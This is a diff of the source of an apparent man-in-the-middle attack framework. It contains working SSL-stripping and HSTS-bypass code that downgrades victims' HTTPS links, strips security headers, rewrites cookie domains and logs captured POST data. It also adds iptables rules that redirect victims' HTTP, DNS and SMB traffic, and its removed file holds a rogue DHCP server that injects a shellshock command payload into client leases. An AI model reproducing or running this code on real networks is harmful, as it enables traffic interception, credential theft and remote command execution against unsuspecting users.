headers['referer'] = dregex.sub(lambda x: str(real[x.string[x.start() :x.end()]]), headers['referer'])
if 'if-none-match' in headers:
del headers['if-none-match']
if 'host' in headers:
host = self.urlMonitor.URLgetRealHost(str(headers['host']))
mitmf_logger.debug("[ClientRequest][HSTS] Modifing HOST header: %s -> %s" % (headers['host'], host))
log.debug("Modifing HOST header: {} -> {}".format(headers['host'], host))
headers['host'] = host
self.setHeader('Host', host)
if 'accept-encoding' in headers:
del headers['accept-encoding']
mitmf_logger.debug("Zapped encoding")
log.debug("Zapped encoding")
if 'if-modified-since' in headers:
del headers['if-modified-since']
if self.urlMonitor.caching is False:
if 'cache-control' in headers:
del headers['cache-control']
if 'if-none-match' in headers:
del headers['if-none-match']
self.plugins.hook()
if 'if-modified-since' in headers:
del headers['if-modified-since']
headers['pragma'] = 'no-cache'
return headers
@ -113,17 +113,17 @@ class ClientRequest(Request):
if os.path.exists(scriptPath): return scriptPath
mitmf_logger.warning("Error: Could not find lock.ico")
log.warning("Error: Could not find lock.ico")
return "lock.ico"
def handleHostResolvedSuccess(self, address):
mitmf_logger.debug("[ClientRequest] Resolved host successfully: %s -> %s" % (self.getHeader('host'), address))
log.debug("Resolved host successfully: {} -> {}".format(self.getHeader('host'), address))
host = self.getHeader("host")
headers = self.cleanHeaders()
client = self.getClientIP()
path = self.getPathFromUri()
url = 'http://' + host + path
self.uri = url # set URI to absolute
self.uri = url # set URI to absolute
if self.content:
self.content.seek(0,0)
@ -132,19 +132,19 @@ class ClientRequest(Request):
if self.hsts:
host = self.urlMonitor.URLgetRealHost(str(host))
real = self.urlMonitor.real
host = self.urlMonitor.URLgetRealHost(str(host))
real = self.urlMonitor.real
patchDict = self.urlMonitor.patchDict
url = 'http://' + host + path
self.uri = url # set URI to absolute
if len(real) > 0:
dregex = re.compile("(%s)" % "|".join(map(re.escape, real.keys())))
if real:
dregex = re.compile("({})".format("|".join(map(re.escape, real.keys()))))
path = dregex.sub(lambda x: str(real[x.string[x.start() :x.end()]]), path)
postData = dregex.sub(lambda x: str(real[x.string[x.start() :x.end()]]), postData)
if len(patchDict) > 0:
dregex = re.compile("(%s)" % "|".join(map(re.escape, patchDict.keys())))
if patchDict:
dregex = re.compile("({})".format("|".join(map(re.escape, patchDict.keys()))))
postData = dregex.sub(lambda x: str(patchDict[x.string[x.start() :x.end()]]), postData)
@ -155,22 +155,19 @@ class ClientRequest(Request):
self.dnsCache.cacheResolution(hostparts[0], address)
if (not self.cookieCleaner.isClean(self.method, client, host, headers)):
mitmf_logger.debug("Sending expired cookies...")
log.debug("Sending expired cookies")
self.sendExpiredCookies(host, path, self.cookieCleaner.getExpireHeaders(self.method, client, host, headers, path))
elif (self.urlMonitor.isSecureFavicon(client, path)):
mitmf_logger.debug("Sending spoofed favicon response...")
log.debug("Sending spoofed favicon response")
self.sendSpoofedFaviconResponse()
elif (self.urlMonitor.isSecureLink(client, url) or ('securelink' in headers)):
if 'securelink' in headers:
del headers['securelink']
mitmf_logger.debug("Sending request via SSL...(%s %s)" % (client,url))
elif self.urlMonitor.isSecureLink(client, url):
log.debug("Sending request via SSL/TLS: {}".format(url))
self.proxyViaSSL(address, self.method, path, postData, headers, self.urlMonitor.getSecurePort(client, url))
else:
mitmf_logger.debug("Sending request via HTTP...")
log.debug("Sending request via HTTP")
#self.proxyViaHTTP(address, self.method, path, postData, headers)
port = 80
if len(hostparts) > 1:
@ -179,7 +176,7 @@ class ClientRequest(Request):
self.proxyViaHTTP(address, self.method, path, postData, headers, port)
def handleHostResolvedError(self, error):
mitmf_logger.debug("[ClientRequest] Host resolution error: " + str(error))
log.debug("Host resolution error: {}".format(error))
try:
self.finish()
except:
@ -189,33 +186,33 @@ class ClientRequest(Request):
address = self.dnsCache.getCachedAddress(host)
if address != None:
mitmf_logger.debug("[ClientRequest] Host cached: %s %s" % (host, str(address)))
log.debug("Host cached: {} {}".format(host, address))
return defer.succeed(address)
else:
mitmf_logger.debug("[ClientRequest] Host not cached.")
if self.resolver == 'dnschef':
try:
address = str(self.customResolver.query(host)[0].address)
return defer.succeed(address)
except Exception:
return defer.fail()
elif self.resolver == 'twisted':
log.debug("Host not cached.")
self.customResolver.port = self.urlMonitor.getResolverPort()
try:
log.debug("Resolving with DNSChef")
address = str(self.customResolver.query(host)[0].address)
return defer.succeed(address)
except Exception:
log.debug("Exception occured, falling back to Twisted")
return reactor.resolve(host)
def process(self):
mitmf_logger.debug("[ClientRequest] Resolving host: %s" % (self.getHeader('host')))
host = self.getHeader('host').split(":")[0]
if self.getHeader('host') is not None:
log.debug("Resolving host: {}".format(self.getHeader('host')))
host = self.getHeader('host').split(":")[0]
if self.hsts:
host = self.urlMonitor.URLgetRealHost("%s"%host)
if self.hsts:
host = self.urlMonitor.URLgetRealHost(str(host))
deferred = self.resolveHost(host)
deferred.addCallback(self.handleHostResolvedSuccess)
deferred.addErrback(self.handleHostResolvedError)
deferred = self.resolveHost(host)
deferred.addCallback(self.handleHostResolvedSuccess)
deferred.addErrback(self.handleHostResolvedError)
def proxyViaHTTP(self, host, method, path, postData, headers, port):
connectionFactory = ServerConnectionFactory(method, path, postData, headers, self)
connectionFactory.protocol = ServerConnection

View file

@ -17,8 +17,10 @@
#
import logging
from core.logger import logger
mitmf_logger = logging.getLogger('mitmf')
formatter = logging.Formatter("%(asctime)s [DnsCache] %(message)s", datefmt="%Y-%m-%d %H:%M:%S")
log = logger().setup_logger("DnsCache", formatter)
class DnsCache:
@ -51,7 +53,7 @@ class DnsCache:
def setCustomRes(self, host, ip_address=None):
if ip_address is not None:
self.cache[host] = ip_address
mitmf_logger.debug("DNS entry set: %s -> %s" %(host, ip_address))
log.debug("DNS entry set: %s -> %s" %(host, ip_address))
else:
if self.customAddress is not None:
self.cache[host] = self.customAddress

View file

@ -16,12 +16,16 @@
# USA
#
import logging, re, string
import logging
import re
import string
from ServerConnection import ServerConnection
from URLMonitor import URLMonitor
from core.logger import logger
mitmf_logger = logging.getLogger('mitmf')
formatter = logging.Formatter("%(asctime)s [SSLServerConnection] %(message)s", datefmt="%Y-%m-%d %H:%M:%S")
log = logger().setup_logger("SSLServerConnection", formatter)
class SSLServerConnection(ServerConnection):
@ -40,7 +44,7 @@ class SSLServerConnection(ServerConnection):
def __init__(self, command, uri, postData, headers, client):
ServerConnection.__init__(self, command, uri, postData, headers, client)
self.urlMonitor = URLMonitor.getInstance()
self.hsts = URLMonitor.getInstance().isHstsBypass()
self.hsts = URLMonitor.getInstance().hsts
def getLogLevel(self):
return logging.INFO
@ -57,11 +61,11 @@ class SSLServerConnection(ServerConnection):
for v in values:
if v[:7].lower()==' domain':
dominio=v.split("=")[1]
mitmf_logger.debug("[SSLServerConnection][HSTS] Parsing cookie domain parameter: %s"%v)
real = self.urlMonitor.sustitucion
log.debug("Parsing cookie domain parameter: %s"%v)
real = self.urlMonitor.real
if dominio in real:
v=" Domain=%s"%real[dominio]
mitmf_logger.debug("[SSLServerConnection][HSTS] New cookie domain parameter: %s"%v)
log.debug("New cookie domain parameter: %s"%v)
newvalues.append(v)
value = ';'.join(newvalues)
@ -85,13 +89,13 @@ class SSLServerConnection(ServerConnection):
if ((not link.startswith('http')) and (not link.startswith('/'))):
absoluteLink = "http://"+self.headers['host']+self.stripFileFromPath(self.uri)+'/'+link
mitmf_logger.debug("Found path-relative link in secure transmission: " + link)
mitmf_logger.debug("New Absolute path-relative link: " + absoluteLink)
log.debug("Found path-relative link in secure transmission: " + link)
log.debug("New Absolute path-relative link: " + absoluteLink)
elif not link.startswith('http'):
absoluteLink = "http://"+self.headers['host']+link
mitmf_logger.debug("Found relative link in secure transmission: " + link)
mitmf_logger.debug("New Absolute link: " + absoluteLink)
log.debug("Found relative link in secure transmission: " + link)
log.debug("New Absolute link: " + absoluteLink)
if not absoluteLink == "":
absoluteLink = absoluteLink.replace('&amp;', '&')

View file

@ -16,19 +16,26 @@
# USA
#
import logging, re, string, random, zlib, gzip, StringIO, sys
import plugins
try:
from user_agents import parse
except:
pass
import logging
import re
import string
import random
import zlib
import gzip
import StringIO
import sys
from user_agents import parse
from twisted.web.http import HTTPClient
from URLMonitor import URLMonitor
from core.sergioproxy.ProxyPlugins import ProxyPlugins
from core.proxyplugins import ProxyPlugins
from core.logger import logger
mitmf_logger = logging.getLogger('mitmf')
formatter = logging.Formatter("%(asctime)s %(clientip)s [type:%(browser)s-%(browserv)s os:%(clientos)s] %(message)s", datefmt="%Y-%m-%d %H:%M:%S")
clientlog = logger().setup_logger("ServerConnection_clientlog", formatter)
formatter = logging.Formatter("%(asctime)s [ServerConnection] %(message)s", datefmt="%Y-%m-%d %H:%M:%S")
log = logger().setup_logger("ServerConnection", formatter)
class ServerConnection(HTTPClient):
@ -53,50 +60,66 @@ class ServerConnection(HTTPClient):
self.postData = postData
self.headers = headers
self.client = client
self.clientInfo = None
self.clientInfo = {}
self.plugins = ProxyPlugins()
self.urlMonitor = URLMonitor.getInstance()
self.hsts = URLMonitor.getInstance().isHstsBypass()
self.app = URLMonitor.getInstance().isAppCachePoisoning()
self.plugins = ProxyPlugins.getInstance()
self.hsts = URLMonitor.getInstance().hsts
self.app = URLMonitor.getInstance().app
self.isImageRequest = False
self.isCompressed = False
self.contentLength = None
self.shutdownComplete = False
def getPostPrefix(self):
return "POST"
self.handle_post_output = False
def sendRequest(self):
if self.command == 'GET':
try:
user_agent = parse(self.headers['user-agent'])
self.clientInfo = "%s [type:%s-%s os:%s] " % (self.client.getClientIP(), user_agent.browser.family, user_agent.browser.version[0], user_agent.os.family)
except:
self.clientInfo = "%s " % self.client.getClientIP()
mitmf_logger.info(self.clientInfo + "Sending Request: %s" % self.headers['host'])
clientlog.info(self.headers['host'], extra=self.clientInfo)
log.debug("Full request: {}{}".format(self.headers['host'], self.uri))
self.plugins.hook()
self.sendCommand(self.command, self.uri)
def sendHeaders(self):
for header, value in self.headers.iteritems():
mitmf_logger.debug("Sending header: (%s => %s)" % (header, value))
log.debug("Sending header: ({}: {})".format(header, value))
self.sendHeader(header, value)
self.endHeaders()
def sendPostData(self):
if 'clientprfl' in self.uri:
self.plugins.hook()
elif 'keylog' in self.uri:
self.plugins.hook()
else:
mitmf_logger.warning("%s %s Data (%s):\n%s" % (self.client.getClientIP(), self.getPostPrefix(), self.headers['host'], self.postData))
self.transport.write(self.postData)
if self.handle_post_output is False: #So we can disable printing POST data coming from plugins
try:
postdata = self.postData.decode('utf8') #Anything that we can't decode to utf-8 isn't worth logging
if len(postdata) > 0:
clientlog.warning("POST Data ({}):\n{}".format(self.headers['host'], postdata), extra=self.clientInfo)
except Exception as e:
if ('UnicodeDecodeError' or 'UnicodeEncodeError') in e.message:
log.debug("{} Ignored post data from {}".format(self.clientInfo['clientip'], self.headers['host']))
self.handle_post_output = False
self.transport.write(self.postData)
def connectionMade(self):
mitmf_logger.debug("HTTP connection made.")
log.debug("HTTP connection made.")
try:
user_agent = parse(self.headers['user-agent'])
self.clientInfo["clientos"] = user_agent.os.family
self.clientInfo["browser"] = user_agent.browser.family
try:
self.clientInfo["browserv"] = user_agent.browser.version[0]
except IndexError:
self.clientInfo["browserv"] = "Other"
except KeyError:
self.clientInfo["clientos"] = "Other"
self.clientInfo["browser"] = "Other"
self.clientInfo["browserv"] = "Other"
self.clientInfo["clientip"] = self.client.getClientIP()
self.plugins.hook()
self.sendRequest()
self.sendHeaders()
@ -105,12 +128,17 @@ class ServerConnection(HTTPClient):
self.sendPostData()
def handleStatus(self, version, code, message):
mitmf_logger.debug("Got server response: %s %s %s" % (version, code, message))
values = self.plugins.hook()
version = values['version']
code = values['code']
message = values['message']
log.debug("Server response: {} {} {}".format(version, code, message))
self.client.setResponseCode(int(code), message)
def handleHeader(self, key, value):
mitmf_logger.debug("[ServerConnection] Receiving header: (%s => %s)" % (key, value))
if (key.lower() == 'location'):
value = self.replaceSecureLinks(value)
if self.app:
@ -119,15 +147,15 @@ class ServerConnection(HTTPClient):
if (key.lower() == 'content-type'):
if (value.find('image') != -1):
self.isImageRequest = True
mitmf_logger.debug("Response is image content, not scanning...")
log.debug("Response is image content, not scanning")
if (key.lower() == 'content-encoding'):
if (value.find('gzip') != -1):
mitmf_logger.debug("Response is compressed...")
log.debug("Response is compressed")
self.isCompressed = True
elif (key.lower()== 'strict-transport-security'):
mitmf_logger.info("%s Zapped a strict-trasport-security header" % self.client.getClientIP())
clientlog.info("Zapped a strict-transport-security header", extra=self.clientInfo)
elif (key.lower() == 'content-length'):
self.contentLength = value
@ -138,15 +166,22 @@ class ServerConnection(HTTPClient):
else:
self.client.setHeader(key, value)
def handleEndHeaders(self):
if (self.isImageRequest and self.contentLength != None):
self.client.setHeader("Content-Length", self.contentLength)
self.client.setHeader("Expires", "0")
self.client.setHeader("Cache-Control", "No-Cache")
if self.length == 0:
self.shutdown()
self.plugins.hook()
def handleEndHeaders(self):
if (self.isImageRequest and self.contentLength != None):
self.client.setHeader("Content-Length", self.contentLength)
if logging.getLevelName(log.getEffectiveLevel()) == "DEBUG":
for header, value in self.headers.iteritems():
log.debug("Receiving header: ({}: {})".format(header, value))
if self.length == 0:
self.shutdown()
def handleResponsePart(self, data):
if (self.isImageRequest):
self.client.write(data)
@ -157,34 +192,35 @@ class ServerConnection(HTTPClient):
if (self.isImageRequest):
self.shutdown()
else:
#Gets rid of some generic errors
try:
HTTPClient.handleResponseEnd(self) #Gets rid of some generic errors
HTTPClient.handleResponseEnd(self)
except:
pass
def handleResponse(self, data):
if (self.isCompressed):
mitmf_logger.debug("Decompressing content...")
log.debug("Decompressing content...")
data = gzip.GzipFile('', 'rb', 9, StringIO.StringIO(data)).read()
#mitmf_logger.debug("Read from server:\n" + data)
data = self.replaceSecureLinks(data)
res = self.plugins.hook()
data = res['data']
data = self.plugins.hook()['data']
#log.debug("Read from server {} bytes of data:\n{}".format(len(data), data))
log.debug("Read from server {} bytes of data".format(len(data)))
if (self.contentLength != None):
self.client.setHeader('Content-Length', len(data))
try:
self.client.write(data) #Gets rid of some generic errors
self.client.write(data)
except:
pass
try:
self.shutdown()
except:
mitmf_logger.info("Client connection dropped before request finished.")
log.info("Client connection dropped before request finished.")
def replaceSecureLinks(self, data):
if self.hsts:
@ -192,32 +228,23 @@ class ServerConnection(HTTPClient):
sustitucion = {}
patchDict = self.urlMonitor.patchDict
if len(patchDict)>0:
dregex = re.compile("(%s)" % "|".join(map(re.escape, patchDict.keys())))
if patchDict:
dregex = re.compile("({})".format("|".join(map(re.escape, patchDict.keys()))))
data = dregex.sub(lambda x: str(patchDict[x.string[x.start() :x.end()]]), data)
iterator = re.finditer(ServerConnection.urlExpression, data)
for match in iterator:
url = match.group()
mitmf_logger.debug("[ServerConnection] Found secure reference: " + url)
nuevaurl=self.urlMonitor.addSecureLink(self.client.getClientIP(), url)
mitmf_logger.debug("[ServerConnection][HSTS] Replacing %s => %s"%(url,nuevaurl))
log.debug("Found secure reference: " + url)
nuevaurl=self.urlMonitor.addSecureLink(self.clientInfo['clientip'], url)
log.debug("Replacing {} => {}".format(url,nuevaurl))
sustitucion[url] = nuevaurl
#data.replace(url,nuevaurl)
#data = self.urlMonitor.DataReemplazo(data)
if len(sustitucion)>0:
dregex = re.compile("(%s)" % "|".join(map(re.escape, sustitucion.keys())))
if sustitucion:
dregex = re.compile("({})".format("|".join(map(re.escape, sustitucion.keys()))))
data = dregex.sub(lambda x: str(sustitucion[x.string[x.start() :x.end()]]), data)
#mitmf_logger.debug("HSTS DEBUG received data:\n"+data)
#data = re.sub(ServerConnection.urlExplicitPort, r'https://\1/', data)
#data = re.sub(ServerConnection.urlTypewww, 'http://w', data)
#if data.find("http://w.face")!=-1:
# mitmf_logger.debug("HSTS DEBUG Found error in modifications")
# raw_input("Press Enter to continue")
#return re.sub(ServerConnection.urlType, 'http://web.', data)
return data
else:
@ -227,11 +254,11 @@ class ServerConnection(HTTPClient):
for match in iterator:
url = match.group()
mitmf_logger.debug("Found secure reference: " + url)
log.debug("Found secure reference: " + url)
url = url.replace('https://', 'http://', 1)
url = url.replace('&amp;', '&')
self.urlMonitor.addSecureLink(self.client.getClientIP(), url)
self.urlMonitor.addSecureLink(self.clientInfo['clientip'], url)
data = re.sub(ServerConnection.urlExplicitPort, r'http://\1/', data)
return re.sub(ServerConnection.urlType, 'http://', data)
@ -244,5 +271,3 @@ class ServerConnection(HTTPClient):
self.transport.loseConnection()
except:
pass

View file

@ -17,9 +17,12 @@
#
import logging
from core.logger import logger
from twisted.internet.protocol import ClientFactory
mitmf_logger = logging.getLogger('mimtf')
formatter = logging.Formatter("%(asctime)s [ServerConnectionFactory] %(message)s", datefmt="%Y-%m-%d %H:%M:%S")
log = logger().setup_logger("ServerConnectionFactory", formatter)
class ServerConnectionFactory(ClientFactory):
@ -34,12 +37,12 @@ class ServerConnectionFactory(ClientFactory):
return self.protocol(self.command, self.uri, self.postData, self.headers, self.client)
def clientConnectionFailed(self, connector, reason):
mitmf_logger.debug("Server connection failed.")
log.debug("Server connection failed.")
destination = connector.getDestination()
if (destination.port != 443):
mitmf_logger.debug("Retrying via SSL")
log.debug("Retrying via SSL")
self.client.proxyViaSSL(self.headers['host'], self.command, self.uri, self.postData, self.headers, 443)
else:
try:

View file

@ -19,9 +19,13 @@
import re, os
import logging
mitmf_logger = logging.getLogger('mimtf')
from core.configwatcher import ConfigWatcher
from core.logger import logger
class URLMonitor:
formatter = logging.Formatter("%(asctime)s [URLMonitor] %(message)s", datefmt="%Y-%m-%d %H:%M:%S")
log = logger().setup_logger("URLMonitor", formatter)
class URLMonitor:
'''
The URL monitor maintains a set of (client, url) tuples that correspond to requests which the
@ -31,8 +35,8 @@ class URLMonitor:
# Start the arms race, and end up here...
javascriptTrickery = [re.compile("http://.+\.etrade\.com/javascript/omntr/tc_targeting\.html")]
_instance = None
sustitucion = {} # LEO: diccionario host / sustitucion
real = {} # LEO: diccionario host / real
sustitucion = dict()
real = dict()
patchDict = {
'https:\/\/fbstatic-a.akamaihd.net':'http:\/\/webfbstatic-a.akamaihd.net',
'https:\/\/www.facebook.com':'http:\/\/social.facebook.com',
@ -46,9 +50,7 @@ class URLMonitor:
self.faviconReplacement = False
self.hsts = False
self.app = False
self.hsts_config = None
self.resolver = 'dnschef'
self.resolverport = 53
self.caching = False
@staticmethod
def getInstance():
@ -57,21 +59,9 @@ class URLMonitor:
return URLMonitor._instance
#This is here because I'm lazy
def setResolver(self, resolver):
self.resolver = str(resolver).lower()
#This is here because I'm lazy
def getResolver(self):
return self.resolver
#This is here because I'm lazy
def setResolverPort(self, port):
self.resolverport = int(port)
#This is here because I'm lazy
def getResolverPort(self):
return self.resolverport
return int(ConfigWatcher().config['MITMf']['DNS']['port'])
def isSecureLink(self, client, url):
for expression in URLMonitor.javascriptTrickery:
@ -86,13 +76,16 @@ class URLMonitor:
else:
return 443
def setCaching(self, value):
self.caching = value
def addRedirection(self, from_url, to_url):
for s in self.redirects:
if from_url in s:
s.add(to_url)
return
url_set = set([from_url, to_url])
mitmf_logger.debug("[URLMonitor][AppCachePoison] Set redirection: %s" % url_set)
log.debug("Set redirection: {}".format(url_set))
self.redirects.append(url_set)
def getRedirectionSet(self, url):
@ -123,6 +116,8 @@ class URLMonitor:
port = 443
if self.hsts:
self.updateHstsConfig()
if not self.sustitucion.has_key(host):
lhost = host[:4]
if lhost=="www.":
@ -131,10 +126,9 @@ class URLMonitor:
else:
self.sustitucion[host] = "web"+host
self.real["web"+host] = host
mitmf_logger.debug("[URLMonitor][HSTS] SSL host (%s) tokenized (%s)" % (host,self.sustitucion[host]) )
log.debug("SSL host ({}) tokenized ({})".format(host, self.sustitucion[host]))
url = 'http://' + host + path
#mitmf_logger.debug("HSTS stripped URL: %s %s"%(client, url))
self.strippedURLs.add((client, url))
self.strippedURLPorts[(client, url)] = int(port)
@ -150,40 +144,32 @@ class URLMonitor:
def setFaviconSpoofing(self, faviconSpoofing):
self.faviconSpoofing = faviconSpoofing
def setHstsBypass(self, hstsconfig):
self.hsts = True
self.hsts_config = hstsconfig
for k,v in self.hsts_config.iteritems():
def updateHstsConfig(self):
for k,v in ConfigWatcher().config['SSLstrip+'].iteritems():
self.sustitucion[k] = v
self.real[v] = k
def setHstsBypass(self):
self.hsts = True
def setAppCachePoisoning(self):
self.app = True
def setClientLogging(self, clientLogging):
self.clientLogging = clientLogging
def isFaviconSpoofing(self):
return self.faviconSpoofing
def isClientLogging(self):
return self.clientLogging
def isHstsBypass(self):
return self.hsts
def isAppCachePoisoning(self):
return self.app
def isSecureFavicon(self, client, url):
return ((self.faviconSpoofing == True) and (url.find("favicon-x-favicon-x.ico") != -1))
def URLgetRealHost(self, host):
mitmf_logger.debug("[URLMonitor][HSTS] Parsing host: %s"% host)
log.debug("Parsing host: {}".format(host))
self.updateHstsConfig()
if self.real.has_key(host):
mitmf_logger.debug("[URLMonitor][HSTS] Found host in list: %s"% self.real[host])
log.debug("Found host in list: {}".format(self.real[host]))
return self.real[host]
else:
mitmf_logger.debug("[URLMonitor][HSTS] Host not in list: %s"% host)
log.debug("Host not in list: {}".format(host))
return host

View file

@ -1,6 +1,3 @@
#! /usr/bin/env python2.7
# -*- coding: utf-8 -*-
# Copyright (c) 2014-2016 Marcello Salvati
#
# This program is free software; you can redistribute it and/or
@ -20,108 +17,86 @@
#
import os
import random
import linecache
import logging
import re
import sys
def PrintException():
exc_type, exc_obj, tb = sys.exc_info()
f = tb.tb_frame
lineno = tb.tb_lineno
filename = f.f_code.co_filename
linecache.checkcache(filename)
line = linecache.getline(filename, lineno, f.f_globals)
return '({}, LINE {} "{}"): {}'.format(filename, lineno, line.strip(), exc_obj)
from core.logger import logger
from core.proxyplugins import ProxyPlugins
from scapy.all import get_if_addr, get_if_hwaddr, get_working_if
class SystemConfig:
formatter = logging.Formatter("%(asctime)s [Utils] %(message)s", datefmt="%Y-%m-%d %H:%M:%S")
log = logger().setup_logger("Utils", formatter)
@staticmethod
def setIpForwarding(value):
with open('/proc/sys/net/ipv4/ip_forward', 'w') as file:
file.write(str(value))
file.close()
def shutdown(message=None):
for plugin in ProxyPlugins().plugin_list:
plugin.on_shutdown()
sys.exit(message)
class IpTables:
def set_ip_forwarding(value):
log.debug("Setting ip forwarding to {}".format(value))
with open('/proc/sys/net/ipv4/ip_forward', 'w') as file:
file.write(str(value))
file.close()
_instance = None
def get_iface():
iface = get_working_if()
log.debug("Interface {} seems to be up and running")
return iface
def __init__(self):
self.dns = False
self.http = False
def get_ip(interface):
try:
ip_address = get_if_addr(interface)
if (ip_address == "0.0.0.0") or (ip_address is None):
shutdown("Interface {} does not have an assigned IP address".format(interface))
@staticmethod
def getInstance():
if IpTables._instance == None:
IpTables._instance = IpTables()
return ip_address
except Exception as e:
shutdown("Error retrieving IP address from {}: {}".format(interface, e))
return IpTables._instance
def get_mac(interface):
try:
mac_address = get_if_hwaddr(interface)
return mac_address
except Exception as e:
shutdown("Error retrieving MAC address from {}: {}".format(interface, e))
def Flush(self):
os.system('iptables -F && iptables -X && iptables -t nat -F && iptables -t nat -X')
self.dns = False
self.http = False
class iptables:
def HTTP(self, http_redir_port):
os.system('iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port %s' % http_redir_port)
self.http = True
dns = False
http = False
smb = False
nfqueue = False
def DNS(self, ip, port):
os.system('iptables -t nat -A PREROUTING -p udp --dport 53 -j DNAT --to %s:%s' % (ip, port))
self.dns = True
__shared_state = {}
class Banners:
def __init__(self):
self.__dict__ = self.__shared_state
banner1 = """
__ __ ___ .--. __ __ ___
| |/ `.' `. |__| | |/ `.' `. _.._
| .-. .-. '.--. .| | .-. .-. ' .' .._|
| | | | | || | .' |_ | | | | | | | '
| | | | | || | .' || | | | | | __| |__
| | | | | || |'--. .-'| | | | | ||__ __|
| | | | | || | | | | | | | | | | |
|__| |__| |__||__| | | |__| |__| |__| | |
| '.' | |
| / | |
`'-' |_|
"""
def flush(self):
log.debug("Flushing iptables")
os.system('iptables -F && iptables -X && iptables -t nat -F && iptables -t nat -X')
self.dns = False
self.http = False
self.smb = False
self.nfqueue = False
banner2= """
"""
def HTTP(self, http_redir_port):
log.debug("Setting iptables HTTP redirection rule from port 80 to {}".format(http_redir_port))
os.system('iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port {}'.format(http_redir_port))
self.http = True
banner3 = """
"""
def DNS(self, dns_redir_port):
log.debug("Setting iptables DNS redirection rule from port 53 to {}".format(dns_redir_port))
os.system('iptables -t nat -A PREROUTING -p udp --destination-port 53 -j REDIRECT --to-port {}'.format(dns_redir_port))
self.dns = True
banner4 = """
___ ___ ___
/\ \ /\ \ /\__\
|::\ \ ___ ___ |::\ \ /:/ _/_
|:|:\ \ /\__\ /\__\ |:|:\ \ /:/ /\__\
__|:|\:\ \ /:/__/ /:/ / __|:|\:\ \ /:/ /:/ /
/::::|_\:\__\ /::\ \ /:/__/ /::::|_\:\__\ /:/_/:/ /
\:\~~\ \/__/ \/\:\ \__ /::\ \ \:\~~\ \/__/ \:\/:/ /
\:\ \ ~~\:\/\__\ /:/\:\ \ \:\ \ \::/__/
\:\ \ \::/ / \/__\:\ \ \:\ \ \:\ \
\:\__\ /:/ / \:\__\ \:\__\ \:\__\
\/__/ \/__/ \/__/ \/__/ \/__/
"""
def SMB(self, smb_redir_port):
log.debug("Setting iptables SMB redirection rule from port 445 to {}".format(smb_redir_port))
os.system('iptables -t nat -A PREROUTING -p tcp --destination-port 445 -j REDIRECT --to-port {}'.format(smb_redir_port))
self.smb = True
def printBanner(self):
banners = [self.banner1, self.banner2, self.banner3, self.banner4]
print random.choice(banners)
def NFQUEUE(self):
log.debug("Setting iptables NFQUEUE rule")
os.system('iptables -I FORWARD -j NFQUEUE --queue-num 0')
self.nfqueue = True

View file

@ -1,378 +0,0 @@
#!/usr/bin/env python2.7
# Copyright (c) 2014-2016 Marcello Salvati
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
# USA
#
import logging
import threading
import binascii
import random
#import dns.resolver
from base64 import b64decode
from urllib import unquote
from time import sleep
#from netfilterqueue import NetfilterQueue
logging.getLogger("scapy.runtime").setLevel(logging.ERROR) #Gets rid of IPV6 Error when importing scapy
from scapy.all import *
mitmf_logger = logging.getLogger('mitmf')
class _DHCP():
def __init__(self, interface, dhcpcfg, ip, mac):
self.interface = interface
self.ip_address = ip
self.mac_address = mac
self.shellshock = None
self.debug = False
self.dhcpcfg = dhcpcfg
self.rand_number = []
self.dhcp_dic = {}
def start(self):
t = threading.Thread(name="dhcp_spoof", target=self.dhcp_sniff, args=(self.interface,))
t.setDaemon(True)
t.start()
def dhcp_sniff(self, interface):
sniff(filter="udp and (port 67 or 68)", prn=self.dhcp_callback, iface=interface)
def dhcp_rand_ip(self):
pool = self.dhcpcfg['ip_pool'].split('-')
trunc_ip = pool[0].split('.'); del(trunc_ip[3])
max_range = int(pool[1])
min_range = int(pool[0].split('.')[3])
number_range = range(min_range, max_range)
for n in number_range:
if n in self.rand_number:
number_range.remove(n)
rand_number = random.choice(number_range)
self.rand_number.append(rand_number)
rand_ip = '.'.join(trunc_ip) + '.' + str(rand_number)
return rand_ip
def dhcp_callback(self, resp):
if resp.haslayer(DHCP):
xid = resp[BOOTP].xid
mac_addr = resp[Ether].src
raw_mac = binascii.unhexlify(mac_addr.replace(":", ""))
if xid in self.dhcp_dic.keys():
client_ip = self.dhcp_dic[xid]
else:
client_ip = self.dhcp_rand_ip()
self.dhcp_dic[xid] = client_ip
if resp[DHCP].options[0][1] is 1:
mitmf_logger.info("Got DHCP DISCOVER from: " + mac_addr + " xid: " + hex(xid))
mitmf_logger.info("Sending DHCP OFFER")
packet = (Ether(src=self.mac_address, dst='ff:ff:ff:ff:ff:ff') /
IP(src=self.ip_address, dst='255.255.255.255') /
UDP(sport=67, dport=68) /
BOOTP(op='BOOTREPLY', chaddr=raw_mac, yiaddr=client_ip, siaddr=self.ip_address, xid=xid) /
DHCP(options=[("message-type", "offer"),
('server_id', self.ip_address),
('subnet_mask', self.dhcpcfg['subnet']),
('router', self.ip_address),
('lease_time', 172800),
('renewal_time', 86400),
('rebinding_time', 138240),
"end"]))
try:
packet[DHCP].options.append(tuple(('name_server', self.dhcpcfg['dns_server'])))
except KeyError:
pass
sendp(packet, iface=self.interface, verbose=self.debug)
if resp[DHCP].options[0][1] is 3:
mitmf_logger.info("Got DHCP REQUEST from: " + mac_addr + " xid: " + hex(xid))
packet = (Ether(src=self.mac_address, dst='ff:ff:ff:ff:ff:ff') /
IP(src=self.ip_address, dst='255.255.255.255') /
UDP(sport=67, dport=68) /
BOOTP(op='BOOTREPLY', chaddr=raw_mac, yiaddr=client_ip, siaddr=self.ip_address, xid=xid) /
DHCP(options=[("message-type", "ack"),
('server_id', self.ip_address),
('subnet_mask', self.dhcpcfg['subnet']),
('router', self.ip_address),
('lease_time', 172800),
('renewal_time', 86400),
('rebinding_time', 138240)]))
try:
packet[DHCP].options.append(tuple(('name_server', self.dhcpcfg['dns_server'])))
except KeyError:
pass
if self.shellshock:
mitmf_logger.info("Sending DHCP ACK with shellshock payload")
packet[DHCP].options.append(tuple((114, "() { ignored;}; " + self.shellshock)))
packet[DHCP].options.append("end")
else:
mitmf_logger.info("Sending DHCP ACK")
packet[DHCP].options.append("end")
